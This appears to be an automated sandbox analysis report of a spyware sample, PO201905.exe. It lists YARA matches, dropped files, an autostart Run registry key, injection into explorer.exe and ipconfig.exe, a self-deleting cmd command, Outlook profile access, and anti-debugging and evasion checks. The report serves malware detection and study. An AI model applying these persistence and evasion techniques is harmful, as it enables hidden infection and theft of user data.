Source: 12.0.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fd0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.50.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.210000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.51e0000.32.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.16.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.21.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.19.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.55.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.11.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53a0000.34.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.f0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b70000.25.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.40.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.23.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.48.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.58.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Matched rule: Embedded_PE (Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs), matched on the following sources:
Source: 6.0.explorer.exe.340000.40.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.2fd0000.18.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.120000.39.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.f0000.0.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20e0000.12.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3090000.58.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4fd0000.29.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.200000.1.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3030000.19.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1c90000.46.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4c00000.27.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.730000.5.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.120000.39.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20d0000.49.unpack, type: UNPACKEDPE
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3230000.60.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3160000.59.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3030000.57.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.51e0000.32.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.730000.5.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4b70000.25.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3030000.57.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20d0000.11.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.9b0000.7.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.5280000.33.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3160000.21.raw.unpack, type: UNPACKEDPE
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.9b0000.45.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.960000.44.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4b80000.26.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1f30000.10.raw.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.210000.2.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1d70000.9.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.960000.44.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4d40000.28.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3160000.59.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.2f00000.55.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.4c00000.27.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.53a0000.34.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1c90000.8.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.21e0000.51.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.25c0000.4.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20e0000.12.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20e0000.50.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1f30000.48.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.2e50000.16.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.21e0000.51.raw.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.fb0000.3.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.9b0000.7.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3330000.23.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3330000.61.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.20d0000.49.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.1d70000.47.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.9b0000.45.unpack, type: UNPACKEDPE
Source: 0.0.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.680000.41.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.3330000.61.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.680000.41.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.33b0000.62.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.680000.3.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.50e0000.31.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.680000.3.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.33b0000.24.raw.unpack, type: UNPACKEDPE
Source: 0.2.PO201905.exe.25c0000.4.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.86e0000.37.raw.unpack, type: UNPACKEDPE
Source: 6.0.explorer.exe.50e0000.31.raw.unpack, type: UNPACKEDPE
Classification label
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@11/6@4/3
Creates files inside the program directory
Source: C:\Windows\explorer.exe | File created: C:\Program Files\Fppxlgn
Creates files inside the user directory
Source: C:\Windows\System32\ipconfig.exe | File created: C:\Users\user\AppData\Roaming\KM3N36B6
Creates temporary files
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Fppxlgn
Found command line output
Source: C:\Windows\System32\cmd.exe | Console Write: ....................C.:.\.U.s.e.r.s.\.p.a.u.l.a.\.D.e.s.k.t.o.p.\.P.O.2.0.1.9.0.5...e.x.e......E..,.d.,.J....F.I....\.,.
Source: C:\Windows\System32\cmd.exe | Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........D.,.........V..I............D.,.....#.=w..,.&...`.....,.....
Might use command line arguments
Source: C:\Users\user\Desktop\PO201905.exe | Command line argument: HexCalc | 0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe | Command line argument: HexCalc | 0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe | Command line argument: HexCalc | 0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe | Command line argument: HexCalc | 0_2_00FB10C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Command line argument: HexCalc | 12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Command line argument: HexCalc | 12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Command line argument: HexCalc | 12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Command line argument: HexCalc | 12_1_010610C0
Reads ini files
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\PO201905.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: PO201905.exe | virustotal: Detection: 16%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\PO201905.exe 'C:\Users\user\Desktop\PO201905.exe'
Source: unknown | Process created: C:\Windows\System32\autoconv.exe unknown
Source: unknown | Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'
Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: unknown | Process created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\autoconv.exe unknown
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Source: C:\Windows\System32\ipconfig.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'
Source: C:\Windows\System32\ipconfig.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32
Writes ini files
Source: C:\Windows\System32\ipconfig.exe | File written: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini
Checks if Microsoft Office is installed
Source: C:\Windows\System32\ipconfig.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Creates a directory in C:\Program Files
Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Fppxlgn
Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
PE file contains a mix of data directories often seen in goodware
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: PO201905.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
Source: PO201905.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbols
Source: Binary string: ipconfig.pdb | source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source: Binary string: C:\Users\Good Gold\Desktop\stub0b\HEXCALC\Release\HEXCALC.pdb | source: PO201905.exe
Source: Binary string: ipconfig.pdbN | source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source: Binary string: ntdll.pdb | source: PO201905.exe
Source: Binary string: ntdll.pdb3 | source: PO201905.exe, 00000000.00000002.4520123297.025C0000.00000040.sdmp
PE file contains a valid data directory to section mapping
Source: PO201905.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO201905.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO201905.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO201905.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO201905.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB47DB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_00FB47DB
PE file contains an invalid checksum
Source: PO201905.exe | Static PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe.6.dr | Static PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe0.6.dr | Static PE information: real checksum: 0xdb70b should be: 0xe4ebf
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FCE44C push edi; iretd | 0_2_00FCE44D
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FD143B push esi; ret | 0_2_00FD143C
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FBFDF8 push cs; ret | 0_2_00FBFE15
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FD45F4 push eax; ret | 0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FD4593 push eax; ret | 0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FD458A push eax; ret | 0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FD453D push eax; ret | 0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB27B5 push ecx; ret | 0_2_00FB27C8
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Code function: 12_1_010627B5 push ecx; ret | 12_1_010627C8
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .data entropy: 7.99430221818
Source: initial sample | Static PE information: section name: .data entropy: 7.99430221818
Source: initial sample | Static PE information: section name: .data entropy: 7.99430221818

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: unknown | Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Drops PE files
Source: C:\Windows\explorer.exe | File created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Fppxlgn\9rxlgd1bcduf.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\System32\ipconfig.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\explorer\Run ZLM0DHTPPJE

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\ipconfig.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ipconfig.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ipconfig.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FC1F58 rdtsc | 0_2_00FC1F58
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3800 | Thread sleep time: -480000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3800 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\ipconfig.exe TID: 3076 | Thread sleep time: -35000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\ipconfig.exe | Last function: Thread delayed
Queries a list of all running processes
Source: C:\Users\user\Desktop\PO201905.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\PO201905.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PO201905.exe | Process queried: DebugPort
Source: C:\Windows\System32\ipconfig.exe | Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FC1F58 rdtsc | 0_2_00FC1F58
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00FB16AB
Contains functionality to dynamically determine API calls
